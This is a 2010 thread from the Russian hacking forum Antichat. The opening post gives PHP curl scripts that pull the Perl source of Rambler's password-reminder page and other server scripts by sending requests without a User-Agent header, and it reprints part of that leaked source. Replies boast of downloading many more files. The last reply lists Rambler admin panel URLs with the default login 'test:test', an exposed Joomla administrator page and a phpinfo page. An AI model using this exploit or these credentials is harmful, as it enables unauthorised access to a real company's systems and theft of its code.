Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Некоторые исходники Рамблера. |

19.02.2010, 20:37
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Некоторые исходники Рамблера.
Совсем нечаянно наткнулся сегодня днем,выкладываю сюда в виде мини статьи.
Запускаем тот скрипт,и смотрим на вывод.
PHP код:
<?php
$exec = curl_init('http://id.rambler.ru/script/reminder.cgi');
curl_setopt($exec, CURLOPT_RETURNTRANSFER, 0);
curl_setopt($exec, CURLOPT_REFERER, 'http://id-planet.rambler.ru/default/');
curl_setopt($exec, CURLOPT_HEADER, 1);
$page = curl_exec($exec);
echo $page;
?>
Запустив скрипт, я был очень удивлен увиденному, а увидел я следующее(приведен лишь отрывок полного кода):
Код:
#!/usr/bin/perl -w # Password reminder for mail.rambler.ru project # Original version by maniac@rambler-co.ru # Rewritten by Maxim Dounin, mdounin@rambler-co.ru # $Id: reminder.cgi,v 1.35 2009/04/02 18:51:47 citrin Exp $ ###############################################################################
use strict;
use warnings;
use utf8;
use CGI qw/ param /;
use Digest::MD5 qw/ md5_hex /;
use Time::HiRes;
use Rambler::CaptchaManager;
use rutils; use r_icq;
use rcfg;
my $H = { myname => 'reminder.cgi', DEBUG => 0, LOG => $rcfg::logdir.'/reminder/reminder_log', # template, used by rutils::print_tmpl TMPL_ROOT => $rcfg::tmpldir, TMPL => 'reminder.tmpl', SKIN => 'id', SKIN_OPT => { DEFAULT => $rcfg::urls{id}, LOGOUT => 'http://www.rambler.ru/', AUTH => $rcfg::urls{id}.'script/auth.cgi', }, # interface charset CHARSET => 'windows-1251', # ratelimits RATE_LOGIN => { rate => 1/3600, burst => 5 }, RATE_IP => { rate => 1/3600, burst => 10 }, RATE_IP_ROBOT => { rate => 1/60, burst => 50 }....
Собственно после несложного мыслительного процесса, я пришел к выводу, что передо мной исходники страницы Восстановление паролей.
А причина то, смешная!
После небольшого танца вокруг Рамблера, было выявлено еще как минимум 5 скриптов, которые можно скачать таким образом, и мне захотелось узнать с чем это связано.Первой мыслью было, что умер интерпретатор Perl, но из браузера я видел вполне нормальный результат работы скрипта, а не его исходник, значит этот вариант отпадает.Посмотрев заголовки отправляемые браузером сервера Рамблера, были поставлены опыты, и выявлено, что Рамблер показывает исходники некоторых скриптов, если к ним обратиться без заголовка User-Agent: ****.
То есть, вот такое обращение к скрипту:
PHP код:
<?php
$header = array('User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8');
$exec = curl_init('http://id.rambler.ru/script/reminder.cgi');
curl_setopt($exec, CURLOPT_RETURNTRANSFER, 0);
curl_setopt($exec, CURLOPT_REFERER, 'http://id-planet.rambler.ru/default/');
curl_setopt($exec, CURLOPT_HEADER, 1);
curl_setopt($exec,CURLOPT_HTTPHEADER, $header);
$page = curl_exec($exec);
echo $page;
?>
вполне нормальное.Увидим результат работы скрипта.Спасебо досвидания.Я отмечать праздники.
Full version статьи!
Всех с наступающим праздником!
|
|
|

19.02.2010, 21:20
|
|
Banned
Регистрация: 18.02.2010
Сообщений: 20
Провел на форуме: 35509
Репутация:
0
|
|
Это походу будет работать на всех сайтах с интерпретатором perl
ЗЫ смешно )
Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )
|
|
|

19.02.2010, 21:24
|
|
Участник форума
Регистрация: 18.05.2010
Сообщений: 215
Провел на форуме: 2972711
Репутация:
92
|
|
сэнкс чувак...
|
|
|

19.02.2010, 21:31
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
Супер! Действительно работает! Если капнуть, то можно скачать около десятка файлов.
Epic fail...
|
|
|

19.02.2010, 21:33
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от XXI
Это походу будет работать на всех сайтах с интерпретатором perl
ЗЫ смешно )
Хотя если скачать исходники, то скоро появятся статьи как отломать мыло )
Fail.
|
|
|

19.02.2010, 22:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
В рамблере остались хоть норм кодеры ? =\
в прошлом году тоже сорцы были в паблике
|
|
|

19.02.2010, 22:16
|
|
Banned
Регистрация: 18.02.2010
Сообщений: 20
Провел на форуме: 35509
Репутация:
0
|
|
Ухах. Скоро рамблеров появится докуя
Я уже 40 исходников скатал )
|
|
|

19.02.2010, 22:20
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Сообщение от XXI
Ухах. Скоро рамблеров появится докуя
Я уже 40 исходников скатал )
Где ты там 40 штук-то нашел?)
|
|
|

19.02.2010, 22:23
|
|
Участник форума
Регистрация: 30.03.2007
Сообщений: 131
Провел на форуме: 1449774
Репутация:
127
|
|
Сообщение от wildshaman
Где ты там 40 штук-то нашел?)
Он наверное один и тотже качает) (востановление паса из статьи)
|
|
|

19.02.2010, 22:29
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме: 1585404
Репутация:
564
|
|
http://in.fo2.rambler.ru/administrator/ Joomla =)
http://ad.rambler.ru/adm/client/ban.adm?cmd=list&item=bn test:test
http://ad.rambler.ru/adm/admin.adm test:test
http://fo2.rambler.ru/info.php phpinfo
Решето ))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|